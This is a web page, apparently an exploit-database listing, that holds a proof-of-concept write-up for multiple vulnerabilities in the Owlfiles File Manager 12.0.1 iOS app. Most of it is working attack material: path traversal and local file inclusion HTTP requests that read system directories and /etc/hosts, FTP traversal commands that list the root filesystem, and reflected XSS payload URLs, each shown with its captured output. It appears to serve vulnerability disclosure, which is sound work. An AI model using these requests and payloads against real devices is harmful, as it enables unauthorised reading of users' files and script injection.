扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 |
# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities # Date: Sep 19, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 # Version: 12.0.1 # Tested on: iPhone iOS 16.0 ########### path traversal on HTTP built-in server ########### GET /../../../../../../../../../../../../../../../System/ HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: 42638202/1663558201/177889085 If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT Connection: close Content-Length: 0 ------- HTTP/1.1 200 OK Cache-Control: max-age=3600, public Content-Length: 317 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader Date: Mon, 19 Sep 2022 05:01:11 GMT <!DOCTYPE html> <html><head><meta charset="utf-8"></head><body> <ul> <li><a href="https://www.exploit-db.com/exploits/51036/Cryptexes/">Cryptexes/</a></li> <li><a href="https://www.exploit-db.com/exploits/51036/DriverKit/">DriverKit/</a></li> <li><a href="https://www.exploit-db.com/exploits/51036/Library/">Library/</a></li> <li><a href="https://www.exploit-db.com/exploits/51036/Applications/">Applications/</a></li> <li><a href="https://www.exploit-db.com/exploits/51036/Developer/">Developer/</a></li> </ul> </body></html> ############# LFI on HTTP built-in server ############# GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ---- HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT Date: Mon, 19 Sep 2022 03:28:14 GMT Content-Length: 213 Cache-Control: max-age=3600, public Etag: 1152921500312187994/1662169021/0 ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting.Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost ############### path traversal on FTP built-in server ############### ftp> cd ../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel256 Jan 01 1970 usr drwxr-xr-x 0 root wheel128 Jan 01 1970 bin drwxr-xr-x 0 root wheel608 Jan 01 1970 sbin drwxr-xr-x 0 root wheel224 Jan 01 1970 System drwxr-xr-x 0 root wheel640 Jan 01 1970 Library drwxr-xr-x 0 root wheel224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> ############# XSS on HTTP built-in server ############# poc 1: http://localhost:8080/download?path=<script>alert(1)</script> poc 2: http://localhost:8080/list?path=<script>alert(1)</script> |
体验盒子
